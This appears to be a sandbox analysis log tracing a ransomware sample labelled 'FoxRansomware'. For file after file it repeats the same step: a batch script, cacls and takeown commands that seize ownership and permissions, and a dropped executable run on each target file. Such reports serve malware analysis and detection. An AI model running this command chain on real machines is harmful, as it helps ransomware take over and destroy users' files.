C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵
- Loads dropped DLL
PID:3684 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:5652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:4556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner3⤵
- Loads dropped DLL
PID:5240 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SYMBOL.TXT" -nobanner4⤵
- Executes dropped EXE
PID:5552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:3736 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:4712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:5596
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3172 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:3808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:3220 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:4160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵
- Loads dropped DLL
PID:5708 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:4264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "behavior.xml" -nobanner3⤵
- Loads dropped DLL
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵
- Loads dropped DLL
PID:5824 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:4584 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵
- Loads dropped DLL
PID:4140 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:4184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr1.dat" -nobanner3⤵
- Loads dropped DLL
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "qmgr1.dat" -nobanner4⤵
- Executes dropped EXE
PID:4216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵
- Loads dropped DLL
PID:4228 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:4456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "device.png" -nobanner3⤵
- Loads dropped DLL
PID:6132 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:4276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:4304 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵
- Loads dropped DLL
PID:824 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner3⤵
- Loads dropped DLL
PID:5880 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tasks.xml" -nobanner4⤵
- Executes dropped EXE
PID:4616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:5924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵
- Modifies file permissions
PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "RTC.der" -nobanner3⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "RTC.der" -nobanner4⤵
- Executes dropped EXE
PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:4856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵
- Modifies file permissions
PID:4876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "end_review.gif" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "end_review.gif" -nobanner4⤵PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:4996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:5036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:5992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:6028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "server_ok.gif" -nobanner3⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "server_ok.gif" -nobanner4⤵PID:6048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:6100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵
- Modifies file permissions
PID:3696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "warning.gif" -nobanner3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "warning.gif" -nobanner4⤵PID:2736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:2492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:5068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:4332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:5088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:4348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFB" -nobanner3⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SY______.PFB" -nobanner4⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:2556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.hyp" -nobanner3⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt.hyp" -nobanner4⤵PID:1616
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:2780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:3396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng32.clx" -nobanner3⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "eng32.clx" -nobanner4⤵PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:3516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2232
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:3600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:3640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:3868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:2548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:2336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:2560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:5372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1140
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:5428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "superbar.png" -nobanner3⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "superbar.png" -nobanner4⤵PID:5532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5528
-
-
-
